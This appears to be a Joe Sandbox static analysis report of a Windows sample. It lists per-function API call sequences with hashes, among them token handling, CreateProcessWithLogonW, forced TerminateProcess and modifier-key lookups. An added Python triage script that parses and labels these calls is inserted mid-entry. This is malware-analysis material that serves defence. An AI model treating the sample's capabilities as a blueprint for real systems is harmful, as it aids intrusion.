                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0078BDF3
                          • RegCloseKey.ADVAPI32(?), ref: 0078BDFF
                          Similarity
                          • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                          • String ID:
                          • API String ID: 1120388591-0
                          • Opcode ID: 553eb15116119e4e62edb638d2521891567073a4997abe79ca1ea446b711fd89
                          • Instruction ID: 6d18fa8932a413a3be7c7e7d94228a518c1b610c877ba96e9c62181508782ecc
                          • Opcode Fuzzy Hash: 553eb15116119e4e62edb638d2521891567073a4997abe79ca1ea446b711fd89
                          • Instruction Fuzzy Hash: 5281B230208241EFD714EF24C895E6ABBE5FF84308F14855DF5598B2A2DB39ED45CBA2
                          APIs
                          • VariantInit.OLEAUT32(00000035), ref: 0075F7B9
                          • SysAllocString.OLEAUT32(00000001), ref: 0075F860
                          • VariantCopy.OLEAUT32(0075FA64,00000000), ref: 0075F889
                          • VariantClear.OLEAUT32(0075FA64), ref: 0075F8AD
                          • VariantCopy.OLEAUT32(0075FA64,00000000), ref: 0075F8B1
                          • VariantClear.OLEAUT32(?), ref: 0075F8BB
                          Similarity
                          • API ID: Variant$ClearCopy$AllocInitString
                          • String ID:
                          • API String ID: 3859894641-0
                          • Opcode ID: d911f466af9e8a218df2a4947b60d26ef3d080f7442f8a00d0af01eec8266668
                          • Instruction ID: 5565539649abc9bf2d22ad0ebf0d18e5d4d20376a0cbb10e26fa8dac9c3d50f1
                          • Opcode Fuzzy Hash: d911f466af9e8a218df2a4947b60d26ef3d080f7442f8a00d0af01eec8266668
                          • Instruction Fuzzy Hash: CE51E831601310FACF10AB65D899BA9B3E8EF45312F248467ED45DF2D1DBB8AC84C796
                          APIs
                            • Part of subcall function 00707620: _wcslen.LIBCMT ref: 00707625
                            • Part of subcall function 00706B57: _wcslen.LIBCMT ref: 00706B6A
                          • GetOpenFileNameW.COMDLG32(00000058), ref: 007794E5
                          • _wcslen.LIBCMT ref: 00779506
                          • _wcslen.LIBCMT ref: 0077952D
                          • GetSaveFileNameW.COMDLG32(00000058), ref: 00779585
                          Similarity
                          • API ID: _wcslen$FileName$OpenSave
                          • String ID: X
                          • API String ID: 83654149-3081909835
                          • Opcode ID: 81ca85133f4e6c6ee3cb7840e144ad321fb42bfa77245ad8a04ad5114cd3365f
                          • Instruction ID: d974e8d1780ec404b7920d6d96468ae27e48f6dff18a3ba945ecc4807c86ab68
                          • Opcode Fuzzy Hash: 81ca85133f4e6c6ee3cb7840e144ad321fb42bfa77245ad8a04ad5114cd3365f
                          • Instruction Fuzzy Hash: DAE1C431604350DFDB24DF24C885A6AB7E0BF85354F048A6DF9899B2E2DB38DD05CB92
                          APIs
                            • Part of subcall function 00719BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00719BB2
                          • BeginPaint.USER32(?,?,?), ref: 00719241
                          • GetWindowRect.USER32(?,?), ref: 007192A5
                          • ScreenToClient.USER32(?,?), ref: 007192C2
                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 007192D3
                          • EndPaint.USER32(?,?,?,?,?), ref: 00719321
                          • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 007571EA
                            • Part of subcall function 00719339: BeginPath.GDI32(00000000), ref: 00719357
                          Similarity
                          • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                          • String ID:
                          • API String ID: 3050599898-0
                          • Opcode ID: 4d84b3d2424dd0e1a8f5cb0bbf734697505f38fae1cd51f47c924cfdb2110b6e
                          • Instruction ID: 56df12ed9ca4c82dd0d65376ca06ceda6a834c079c1fd467784d0a523645438b
                          • Opcode Fuzzy Hash: 4d84b3d2424dd0e1a8f5cb0bbf734697505f38fae1cd51f47c924cfdb2110b6e
                          • Instruction Fuzzy Hash: 2641B370105240EFD711DF58DCA4FF67BB8EB45321F14422AFAA4871E1C7789886DB65
                          APIs
                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 0077080C
                          • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00770847
                          • EnterCriticalSection.KERNEL32(?), ref: 00770863
                          • LeaveCriticalSection.KERNEL32(?), ref: 007708DC
                          • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 007708F3
                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00770921
                          Similarity
                          • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                          • String ID:
                          • API String ID: 3368777196-0
                          • Opcode ID: 5ab97ea4ae348b5372c5e04aff8cc1c40ca0a48c598229ea6edf01f4d3f911c9
                          • Instruction ID: bb4bdd6a8a173c97b234023063f12c580b4aef09ad7ede118cfdea3672f8fc90
                          • Opcode Fuzzy Hash: 5ab97ea4ae348b5372c5e04aff8cc1c40ca0a48c598229ea6edf01f4d3f911c9
                          • Instruction Fuzzy Hash: 1B415C71A00205EFDF15EF54DC85AAA77B8FF04310F1480A9ED049A297D738EE65DBA4
                          APIs
                          • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0075F3AB,00000000,?,?,00000000,?,0075682C,00000004,00000000,00000000), ref: 0079824C
                          • EnableWindow.USER32(00000000,00000000), ref: 00798272
                          • ShowWindow.USER32(FFFFFFFF,00000000), ref: 007982D1
                          • ShowWindow.USER32(00000000,00000004), ref: 007982E5
                          • EnableWindow.USER32(00000000,00000001), ref: 0079830B
                          • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0079832F
                          Similarity
                          • API ID: Window$Show$Enable$MessageSend
                          • String ID:
                          • API String ID: 642888154-0
                          • Opcode ID: 89d1396c738004f2dd45a62f3f7ca55878cd1836bbb76e5f52ce8fba50bc6805
                          • Instruction ID: 407f7fea6b35387b86a355555ce0b670fb6ba5e37e71631ef82267d6e3b88e55
                          • Opcode Fuzzy Hash: 89d1396c738004f2dd45a62f3f7ca55878cd1836bbb76e5f52ce8fba50bc6805
                          • Instruction Fuzzy Hash: 65419434601644AFDF51CF15E899BE87BF0FB0B714F5881AAE5084B262CB39A841CB56
                          APIs
                          • IsWindowVisible.USER32(?), ref: 00764C95
                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00764CB2
                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00764CEA
                          • _wcslen.LIBCMT ref: 00764D08
                          • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00764D10
                          • _wcsstr.LIBVCRUNTIME ref: 00764D1A
                          Similarity
                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                          • String ID:
                          • API String ID: 72514467-0
                          • Opcode ID: a9c46c63cfcf355e67ab1e73e44e9ec546ba49094ead8f53906c460193128842
                          • Instruction ID: 97454028e098968245f55b230efc7516e7fd3b821eb3ba67cc52241c2cee1987
                          • Opcode Fuzzy Hash: a9c46c63cfcf355e67ab1e73e44e9ec546ba49094ead8f53906c460193128842
                          • Instruction Fuzzy Hash: 2121F332704210BBEB265B39EC49E7B7BACDF45750F10806AFD06CA192EB69DC4196A0
                          APIs
                            • Part of subcall function 00703AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00703A97,?,?,00702E7F,?,?,?,00000000), ref: 00703AC2
                          • _wcslen.LIBCMT ref: 0077587B
                          • CoInitialize.OLE32(00000000), ref: 00775995
                          • CoCreateInstance.OLE32(0079FCF8,00000000,00000001,0079FB68,?), ref: 007759AE
                          • CoUninitialize.OLE32 ref: 007759CC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                          • String ID: .lnk
                          • API String ID: 3172280962-24824748
                          • Opcode ID: 19e46013ea3783cf3b05d0eba529d660b78f2b8c294cf735a7f135c8d2b73cb3
                          • Instruction ID: 11c33e7273a53026254e740be4bb7da2dc650ad7e79da33a0d0630fff12abf46
                          • Opcode Fuzzy Hash: 19e46013ea3783cf3b05d0eba529d660b78f2b8c294cf735a7f135c8d2b73cb3
                          • Instruction Fuzzy Hash: CCD163B1A04701DFCB14DF24C484A2ABBE1EF89350F14895DF9899B3A1DB79EC45CB92
                          APIs
                            • Part of subcall function 00760FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00760FCA
                            • Part of subcall function 00760FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00760FD6
                            • Part of subcall function 00760FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00760FE5
                            • Part of subcall function 00760FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00760FEC
                            • Part of subcall function 00760FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00761002
                          • GetLengthSid.ADVAPI32(?,00000000,00761335), ref: 007617AE
                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 007617BA
                          • HeapAlloc.KERNEL32(00000000), ref: 007617C1
                          • CopySid.ADVAPI32(00000000,00000000,?), ref: 007617DA
                          • GetProcessHeap.KERNEL32(00000000,00000000,00761335), ref: 007617EE
                          • HeapFree.KERNEL32(00000000), ref: 007617F5
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                          • String ID:
                          • API String ID: 3008561057-0
                          • Opcode ID: 2c20050508ca7b0c80630b283c96d51d1287d2a628941cb26a1a203749ff3a2b
                          • Instruction ID: 5213d4793366b110f0b25e9372ea799a642beb10719dfe412cfa7b78f3822b2b
                          • Opcode Fuzzy Hash: 2c20050508ca7b0c80630b283c96d51d1287d2a628941cb26a1a203749ff3a2b
                          • Instruction Fuzzy Hash: 1411BE71500205FFDF119FA4CC49BAF7BA9EB41355F588019F94297210D739AE41CB64
                          APIs
                          • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 007614FF
                          • OpenProcessToken.ADVAPI32(00000000), ref: 00761506
                          • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00761515
                          • CloseHandle.KERNEL32(00000004), ref: 00761520
                          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0076154F
                          • DestroyEnvironmentBlock.USERENV(00000000), ref: 00761563
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                          • String ID:
                          • API String ID: 1413079979-0
                          • Opcode ID: d32a70bebcfc64bf3461ff22acc68f02ede3618ac6637f1a8fd8a4b5ce7b4415
                          • Instruction ID: 7d59601543f1b1d99510cac231e939e9087775130abacad5c2d3f0704c9f3387
                          • Opcode Fuzzy Hash: d32a70bebcfc64bf3461ff22acc68f02ede3618ac6637f1a8fd8a4b5ce7b4415
                          • Instruction Fuzzy Hash: A3113D7250124DABDF128F98DE49FDE7BA9EF48744F088015FE06A2060C379CE61DB61
                          APIs
                          • GetLastError.KERNEL32(?,?,00723379,00722FE5), ref: 00723390
                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0072339E
                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 007233B7
                          • SetLastError.KERNEL32(00000000,?,00723379,00722FE5), ref: 00723409
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ErrorLastValue___vcrt_
                          • String ID:
                          • API String ID: 3852720340-0
                          • Opcode ID: c230f303aca3d5d82eb88de68fd9ead50e583bcb6f9c4060081873754f551728
                          • Instruction ID: be46d0e75deed71e325f3e8d248f1fce419adb7b127fba33f0f5c54b3a735b41
                          • Opcode Fuzzy Hash: c230f303aca3d5d82eb88de68fd9ead50e583bcb6f9c4060081873754f551728
                          • Instruction Fuzzy Hash: 8801F733609331FEAA2637747C89A672B98EB05779720422EF414952F2EF1D4E435558
                          APIs
                          • GetLastError.KERNEL32(?,?,00735686,00743CD6,?,00000000,?,00735B6A,?,?,?,?,?,0072E6D1,?,007C8A48), ref: 00732D78
                          • _free.LIBCMT ref: 00732DAB
                          • _free.LIBCMT ref: 00732DD3
                          • SetLastError.KERNEL32(00000000,?,?,?,?,0072E6D1,?,007C8A48,00000010,00704F4A,?,?,00000000,00743CD6), ref: 00732DE0
                          • SetLastError.KERNEL32(00000000,?,?,?,?,0072E6D1,?,007C8A48,00000010,00704F4A,?,?,00000000,00743CD6), ref: 00732DEC
                          • _abort.LIBCMT ref: 00732DF2
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ErrorLast$_free$_abort
                          • String ID:
                          • API String ID: 3160817290-0
                          • Opcode ID: d6d7767a4fbb80ade0cf1319ef5a453be62e8b23c864b17eed9638483bc62f97
                          • Instruction ID: 1b9755485af8650596ba34cc85440ed39ced5074ffb4dce5cff8a3a7354cc55f
                          • Opcode Fuzzy Hash: d6d7767a4fbb80ade0cf1319ef5a453be62e8b23c864b17eed9638483bc62f97
                          • Instruction Fuzzy Hash: C4F0C832715610BBF6232735BC0EF5B2659BFC27A1F244419F824922E3EE2C98035165
                          APIs
                            • Part of subcall function 00719639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00719693
                            • Part of subcall function 00719639: SelectObject.GDI32(?,00000000), ref: 007196A2
                            • Part of subcall function 00719639: BeginPath.GDI32(?), ref: 007196B9
                            • Part of subcall function 00719639: SelectObject.GDI32(?,00000000), ref: 007196E2
                          • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00798A4E
                          • LineTo.GDI32(?,00000003,00000000), ref: 00798A62
                          • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00798A70
                          • LineTo.GDI32(?,00000000,00000003), ref: 00798A80
                          • EndPath.GDI32(?), ref: 00798A90
                          • StrokePath.GDI32(?), ref: 00798AA0
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                          • String ID:
                          • API String ID: 43455801-0
                          • Opcode ID: ae3ed36d7934cc163eb4260cc421cbec027101942e03232d7edf9d6447b3d875
                          • Instruction ID: 29eb0e3057634865623936a96a0ae6194d9ede7b77436b838964737012db2e52
                          • Opcode Fuzzy Hash: ae3ed36d7934cc163eb4260cc421cbec027101942e03232d7edf9d6447b3d875
                          • Instruction Fuzzy Hash: 9F11097604014CFFDF129F94EC88EAA7F6DEB08350F00C012FA199A1A1C775AD56DBA4
                          APIs
                          • GetDC.USER32(00000000), ref: 00765218
                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 00765229
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00765230
                          • ReleaseDC.USER32(00000000,00000000), ref: 00765238
                          • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0076524F
                          • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00765261
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: CapsDevice$Release
                          • String ID:
                          • API String ID: 1035833867-0
                          • Opcode ID: ba13d27a22dab09da9471b2897ee73c322d4bb1e817b3e08369e221b5e315fb5
                          • Instruction ID: 255f6acba5fbaf3c5c922ff5e7a0503f12f3fe54337e194754428a26dddb3f00
                          • Opcode Fuzzy Hash: ba13d27a22dab09da9471b2897ee73c322d4bb1e817b3e08369e221b5e315fb5
                          • Instruction Fuzzy Hash: F0018FB5A00708BBEF119BA59C49A4EBFB8FB48351F048066FA05A7280D6749801CBA4
                          APIs
                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00701BF4
                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 00701BFC
                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00701C07
                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00701C12
                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 00701C1A
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00701C22
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Virtual
                          • String ID:
                          • API String ID: 4278518827-0
                          • Opcode ID: 9301c990123db78179f95062be692d60ff009cee9cea926f34246c0f0649664e
                          • Instruction ID: 0b6bea5549b196457eea7d0a2702b650a7444a64445dadfd7c2efb538c22d5a3
                          • Opcode Fuzzy Hash: 9301c990123db78179f95062be692d60ff009cee9cea926f34246c0f0649664e
                          • Instruction Fuzzy Hash: 280167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00415BA15C4BA42C7F5A864CBE5
                          APIs
                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0076EB30
                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0076EB46
                          • GetWindowThreadProcessId.USER32(?,?), ref: 0076EB55
                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0076EB64
                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0076EB6E
                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0076EB75
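The "APIs" lists in this report are plain text, so an analyst who wants to triage many functions at once needs to parse them and decode the numeric arguments. The block below is an added example written for this page; it is not Joe Sandbox code and not code from the sample. It parses the line format as it appears on this page (an assumption inferred from these lines, not a documented format), decodes the constants that matter in the CreateProcessWithLogonW, MapVirtualKeyW and PostMessageW/TerminateProcess functions listed above using Windows SDK values, and flags the call chains as behaviours. The chain labels are the editor's own characterisation of the sequences, and the three input blocks are copies of the report's own lines embedded as constructed input so the script runs offline.

```python
"""Parse Joe Sandbox 'APIs' lines, decode the constants, flag call chains.

Added example for this report page; not Joe Sandbox or sample code. The line
regex is inferred from the lines shown on the page (assumption); the constant
names come from the Windows SDK headers."""
import re
from dataclasses import dataclass


@dataclass
class ApiCall:
    name: str
    module: str
    args: list      # ints, or None where the report prints '?'
    ref: int        # call-site address printed after 'ref:'
    subcall: bool   # True for 'Part of subcall function ...' lines


_LINE = re.compile(
    r"^\s*•?\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")


def _arg(tok):
    tok = tok.strip()
    if tok in ("", "?"):
        return None
    return int(tok, 16)          # the report prints signed hex such as -00000002


def parse_block(text):
    """Return the ApiCall records found in one 'APIs' block, in report order."""
    calls = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        args = [_arg(t) for t in m["args"].split(",")] if m["args"] is not None else []
        calls.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16), bool(m["sub"])))
    return calls


VK = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN",
      0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT"}

CONSTANTS = {  # (api, zero-based argument index) -> {value: symbolic name}
    ("PostMessageW", 1): {0x10: "WM_CLOSE"},
    ("SendMessageTimeoutW", 1): {0x10: "WM_CLOSE"},
    ("SendMessageTimeoutW", 4): {0x2: "SMTO_ABORTIFHUNG"},
    ("OpenProcess", 0): {0x1F0FFF: "PROCESS_ALL_ACCESS (pre-Vista value, _WIN32_WINNT < 0x0600)"},
    ("MapVirtualKeyW", 0): VK,
    ("MapVirtualKeyW", 1): {0x0: "MAPVK_VK_TO_VSC"},
    ("GetDeviceCaps", 1): {0x58: "LOGPIXELSX", 0x5A: "LOGPIXELSY"},
    ("CoCreateInstance", 2): {0x1: "CLSCTX_INPROC_SERVER"},
    ("GetTokenInformation", 1): {0x2: "TokenGroups"},
    ("GetSysColor", 0): {0x5: "COLOR_WINDOW"},
}


def decode(call):
    """Symbolic names for the arguments the tables above know about."""
    out = []
    for i, v in enumerate(call.args):
        name = CONSTANTS.get((call.name, i), {}).get(v)
        if name:
            out.append(f"{call.name} arg{i}=0x{v:X} -> {name}")
    return out


CHAINS = {  # editor's labels; a chain matches if its APIs appear in this order
    "graceful WM_CLOSE then forced TerminateProcess":
        ["PostMessageW", "SendMessageTimeoutW", "GetWindowThreadProcessId",
         "OpenProcess", "TerminateProcess"],
    "process launch under alternate credentials":
        ["OpenProcessToken", "CreateEnvironmentBlock", "CreateProcessWithLogonW"],
    "COM instantiation inside CoInitialize/CoUninitialize":
        ["CoInitialize", "CoCreateInstance", "CoUninitialize"],
}


def _is_subsequence(pattern, names):
    it = iter(names)
    return all(any(p == n for n in it) for p in pattern)


def match_chains(calls):
    names = [c.name for c in calls if not c.subcall]   # subcalls belong to callees
    hits = [label for label, pat in CHAINS.items() if _is_subsequence(pat, names)]
    modifiers = sum(1 for c in calls if c.name == "MapVirtualKeyW" and c.args and c.args[0] in VK)
    if modifiers >= 4:
        hits.append("scan-code lookup for all keyboard modifier keys")
    return hits


def analyze(text):
    calls = parse_block(text)
    return {"calls": [c.name for c in calls],
            "decoded": [d for c in calls for d in decode(c)],
            "chains": match_chains(calls)}


# Constructed input: three 'APIs' blocks copied from the report above.
KILL_BLOCK = """\
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0076EB30
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0076EB46
• GetWindowThreadProcessId.USER32(?,?), ref: 0076EB55
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0076EB64
• TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0076EB6E
• CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0076EB75
"""
RUNAS_BLOCK = """\
• GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 007614FF
• OpenProcessToken.ADVAPI32(00000000), ref: 00761506
• CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00761515
• CloseHandle.KERNEL32(00000004), ref: 00761520
• CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0076154F
• DestroyEnvironmentBlock.USERENV(00000000), ref: 00761563
"""
KEYS_BLOCK = """\
• MapVirtualKeyW.USER32(0000005B,00000000), ref: 00701BF4
• MapVirtualKeyW.USER32(00000010,00000000), ref: 00701BFC
• MapVirtualKeyW.USER32(000000A0,00000000), ref: 00701C07
• MapVirtualKeyW.USER32(000000A1,00000000), ref: 00701C12
• MapVirtualKeyW.USER32(00000011,00000000), ref: 00701C1A
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00701C22
"""

if __name__ == "__main__":
    for block in (KILL_BLOCK, RUNAS_BLOCK, KEYS_BLOCK):
        print(analyze(block))
```

Two details worth noting when reading the decoded output: the SendMessageTimeoutW call waits at most 0x1F4 (500) ms with SMTO_ABORTIFHUNG before the code falls through to TerminateProcess, and the 0x1F0FFF access mask is the PROCESS_ALL_ACCESS value from older SDK headers, so a hunting rule keyed on the current 0x1FFFFF value would miss this call.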
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                          • String ID:
